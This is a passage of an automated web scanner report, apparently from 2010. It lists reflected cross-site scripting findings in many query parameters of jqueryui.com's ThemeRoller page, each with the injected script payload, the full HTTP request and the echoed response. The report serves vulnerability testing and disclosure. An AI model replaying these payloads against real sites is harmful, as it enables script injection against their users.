olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pngc68d8"><script>alert(1)</script>af61a3700a5&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

1.97. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1b58"><script>alert(1)</script>389286bb224 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pnge1b58"><script>alert(1)</script>389286bb224&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pnge1b58"><script>alert(1)</script>389286bb224&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.98. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab614"><script>alert(1)</script>ca0cfcb45f was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7ab614"><script>alert(1)</script>ca0cfcb45f&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ver=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7ab614"><script>alert(1)</script>ca0cfcb45f&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorE
...[SNIP]...

1.99. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5530b"><script>alert(1)</script>d1cd2634cc was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e25530b"><script>alert(1)</script>d1cd2634cc&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e25530b"><script>alert(1)</script>d1cd2634cc&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5
...[SNIP]...

1.100. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4da56"><script>alert(1)</script>936f3c9192a was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec4da56"><script>alert(1)</script>936f3c9192a&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec4da56"><script>alert(1)</script>936f3c9192a&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextur
...[SNIP]...

1.101. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de6e4"><script>alert(1)</script>0a9d3abb1a4 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0ade6e4"><script>alert(1)</script>0a9d3abb1a4&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0ade6e4"><script>alert(1)</script>0a9d3abb1a4&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

1.102. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8f98"><script>alert(1)</script>7af9b46dd90 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7e8f98"><script>alert(1)</script>7af9b46dd90&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
da%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7e8f98"><script>alert(1)</script>7af9b46dd90&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefaul
...[SNIP]...

1.103. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4e27"><script>alert(1)</script>99d680e85f8 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42ef4e27"><script>alert(1)</script>99d680e85f8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rd.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42ef4e27"><script>alert(1)</script>99d680e85f8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

1.104. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed482"><script>alert(1)</script>135f2cc6947 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7ed482"><script>alert(1)</script>135f2cc6947&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7ed482"><script>alert(1)</script>135f2cc6947&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec
...[SNIP]...

1.105. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9f44"><script>alert(1)</script>d3edcd87640 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxd9f44"><script>alert(1)</script>d3edcd87640&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
